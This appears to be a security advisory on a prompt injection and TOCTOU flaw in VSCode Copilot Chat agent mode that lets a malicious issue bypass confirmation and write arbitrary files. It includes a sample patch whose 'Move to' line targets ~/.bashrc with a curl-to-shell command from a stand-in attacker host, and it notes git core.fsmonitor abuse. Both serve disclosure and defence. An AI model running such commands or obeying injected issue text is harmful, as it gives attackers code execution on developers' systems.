Critical RCE Vulnerability Discovered in VSCode Copilot Chat Agent Mode
Key Takeaways
- VSCode Copilot Chat agent mode is vulnerable to a prompt injection + TOCTOU attack chain allowing RCE
- The applyPatchTool checks source file paths for security but fails to validate destination paths in "Move to" directives
- Attackers can bypass user confirmation mechanisms to write arbitrary files and achieve code execution
Summary
Security researchers have discovered a critical remote code execution (RCE) vulnerability in Microsoft VSCode's Copilot Chat agent mode. The vulnerability chains a prompt injection attack with a time-of-check-to-time-of-use (TOCTOU) flaw in the applyPatchTool component, allowing attackers to bypass user confirmation mechanisms and write arbitrary files to a developer's system.
The attack begins when a repository maintainer uses VSCode's "code with agent mode" feature on a malicious issue. The Copilot agent automatically processes the issue description, which can contain crafted prompts designed to trigger code modifications. While VSCode previously added confirmation dialogs for sensitive file operations, researchers found that the applyPatchTool's user confirmation only validates source file paths from "Update File" directives, completely overlooking the "Move to" directive that specifies the destination path.
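The validation gap described above can be sketched in a few lines of Python. This is a hypothetical illustration of the flawed logic, not the actual VSCode source: the function names, directive strings, and sensitive-path list are all assumptions made for the example.

```python
# Hypothetical sketch of the flawed confirmation check: it inspects only
# "Update File" source paths, so a "Move to" destination is never examined.
SENSITIVE_SUFFIXES = (".bashrc", ".zshrc", ".git/config")

def needs_confirmation_flawed(patch_lines):
    """Return True if the patch should trigger a confirmation dialog.
    Bug: only 'Update File' paths are checked."""
    for line in patch_lines:
        if line.startswith("*** Update File: "):
            path = line[len("*** Update File: "):].strip()
            if path.endswith(SENSITIVE_SUFFIXES):
                return True
    return False  # "Move to:" destinations fall through unchecked

malicious_patch = [
    "*** Update File: docs/notes.md",  # benign-looking source path
    "*** Move to: ~/.bashrc",          # sensitive destination, never validated
]
print(needs_confirmation_flawed(malicious_patch))  # -> False: no dialog shown
```

Because only the source path is examined, the sensitive destination slips through and the write proceeds without any user prompt.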
By exploiting this gap, an attacker can craft a patch that passes the security check but then uses the unchecked "Move to" directive to rename and write files to sensitive locations. The vulnerability can be weaponized to overwrite shell configuration files (.bashrc, .zshrc) or .git/config, achieving remote code execution with the privileges of the affected developer.
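A malicious patch exploiting the gap might look like the following. The directive syntax is paraphrased from the apply-patch format and all paths and payloads are illustrative:

```text
*** Begin Patch
*** Update File: docs/notes.md     <- source path: passes the confirmation check
*** Move to: ~/.bashrc             <- destination path: never validated
@@
+curl -s https://attacker.example/payload.sh | sh
*** End Patch
```

Once such a file is written, execution follows from normal developer activity: a shell rc file runs on the next interactive shell, and Git configuration keys such as core.fsmonitor can cause Git to execute an attacker-supplied command during routine operations like `git status`.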
The vulnerability demonstrates how TOCTOU flaws can undermine AI agent safety mechanisms, particularly when multiple components handle different aspects of security validation without proper coordination. This case highlights the importance of comprehensive input validation in agent-based systems where untrusted content (like GitHub issues) can directly trigger tool invocations.
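The remediation lesson, comprehensive validation across all directives, can be sketched as follows. Again this is an illustrative design, not the actual fix shipped by Microsoft; the directive names and regular expression are assumptions for the example.

```python
import re

# Hypothetical fix: enumerate EVERY path a patch can touch, including
# "Move to" destinations, before deciding whether to prompt the user.
PATH_DIRECTIVE = re.compile(
    r"^\*\*\* (?:Update File|Add File|Delete File|Move to): (.+)$"
)

def paths_touched(patch_lines):
    """Collect all file paths named by any directive in the patch."""
    return [m.group(1).strip()
            for line in patch_lines
            if (m := PATH_DIRECTIVE.match(line))]

def needs_confirmation(patch_lines,
                       sensitive=(".bashrc", ".zshrc", ".git/config")):
    """Prompt if ANY touched path (source or destination) is sensitive."""
    return any(p.endswith(sensitive) for p in paths_touched(patch_lines))

print(needs_confirmation([
    "*** Update File: docs/notes.md",
    "*** Move to: ~/.bashrc",
]))  # -> True: the destination is now validated too
```

Validating the complete set of affected paths in one place, rather than per-directive in separate components, closes the gap between check and use.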
The vulnerability affects any developer who runs "code with agent mode" against a repository or issue containing attacker-controlled content.
Editorial Opinion
This vulnerability exposes a critical gap in how AI agent safety mechanisms are implemented. Even when individual security controls such as user confirmation dialogs exist, they can be rendered ineffective by incomplete validation logic that does not account for all code paths and directives. As AI agents gain more autonomy in developer tools, airtight input validation and comprehensive security checks across all operations become essential, not optional.